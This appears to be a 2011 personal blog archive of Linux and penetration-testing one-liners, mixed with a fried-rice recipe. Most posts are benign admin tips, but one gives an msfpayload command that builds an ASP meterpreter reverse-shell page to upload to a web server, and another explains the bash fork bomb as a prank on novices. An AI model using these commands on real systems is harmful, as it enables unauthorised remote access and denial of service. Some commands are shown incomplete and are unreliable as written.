Wednesday, November 30, 2011

Telnet awesomeness

Saw this on reddit. I love geeks:


Tuesday, November 29, 2011

Prepending text to a file

no mo' temp files

echo lol > rofl.txt
echo wut | cat - rofl.txt | tee rofl.txt > /dev/null

this makes cat concatenate firstly the stdin, which in this case is the piped output from echo, and then the file you prepend it to then redirects that stdout to tee which outputs it to the original file.

Move running process to screen

ctrl+z #to suspend
bg #to background
screen retty $PID #to move the PID to screen

install retty using apt-get

Python & ruby saves json output

At first I was disgusted by json output. then python made it pretty. thanks python

cat t2.json | python -mjson.tool
you can do the same thing with ruby albeit longer:
cat t2.json | ruby -e "require 'rubygems'; require 'json'; puts JSON.pretty_generate(JSON[]);"

Dumping GNU screen output

I like to have a copy of my screen sessions as a text file for future reference and reporting when i do my pentests.

while in screen type c-a :hardcopy -h dumpofwindow1

this should create a file "dumpofwindow1" in the home dir.

You can view it with cat

*-h dumps the entire scrollback buffer. its improtant to remember that its useless if you are in less or vi or something similar.

Wednesday, November 23, 2011

Understanding the BASH fork bomb

:(){ :|:& }

is a good old fashion troll against noobs in linux. The above command basically sets up a function named ":" - This trips up noobies because they dont quite get what that is, the dont realize that functions can be named almost anything, not just conventional names like myFunction().

The core of the function basically sets up a pipe and runs in the background that constantly runs and runs again. Thereby using up all the resources on the machine extremely quickly. The funny part is if they try to perform some action to free up resources, the function simply uses up those resources again.

Its a classic.

Ghetto locate

some boxes dont have locate/updatedb on them for indexed searching of the filesystem. This sucks when you need to look for several files. You can create your own ghetto version by:

find / -print > filesystemlisting
and then grepping through that for your entries.
the find command just outputs the entire filesystem names to that file as absolute paths.
easy smeasy

Thursday, November 10, 2011

Forever Alone Teriyaki Egg Fried Rice

Serves one.

1/2 cup of rice
3/4 cup of water
2 eggs
teriyaki sauce

put the rice and water in your rice cooker. push button. wait. wait some more. when its done, wait 10 more minutes so it actually fucking softens. meanwhile waiting, go to stove. put oil in pan, turn on heat. meanwhile heating, crack eggs into bowl, beat, add some salt. pour eggs into pan, stir with the energy of a thousand suns. bam bitch you just made scrambled eggs. turn off heat, let eggs sit on warm stovetop until rice is done. scoop rice into bowl. scoop eggs into bowl. pour teriyaki sauce like a boss. FEED

Wednesday, November 9, 2011

ASP Encoded Meterpreter Payload

Here is the line to create a meterpreter payload that has been outputted as an ASP page. Upload/include this into webserver to have them call back to you:

msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 R | msfencode -t asp > lolwut.asp

Thursday, November 3, 2011

Credit Card Validation

bookmark this naow:

Parse .gnmap into separate files

I wanted each host line of my .gnmap file to be parsed into separate files with the ports as the contents, each port on a separate line. below is the one liner:
for i in `cat local1.gnmap | cut -d ' ' -f 2`; do grep $i local1.gnmap |awk 'BEGIN {FS=": "} {for(i=1;i<=NF;i++)print $i}'|grep open|awk 'BEGIN {FS="/, "} {for(i=1;i<=NF;i++)print $i}' >> $i;done
replace local1.gnmap with the name of your gnmap file. This should product output like so:
22/open/tcp//ssh//Cisco SSH 1.25 (protocol 1.99)
23/open/tcp//telnet//Cisco router
443/open/tcp//ssl|http//Cisco IOS http config/
This may mean nothing to you, but for me, its going to make grepping through recon SOOOO much simpler.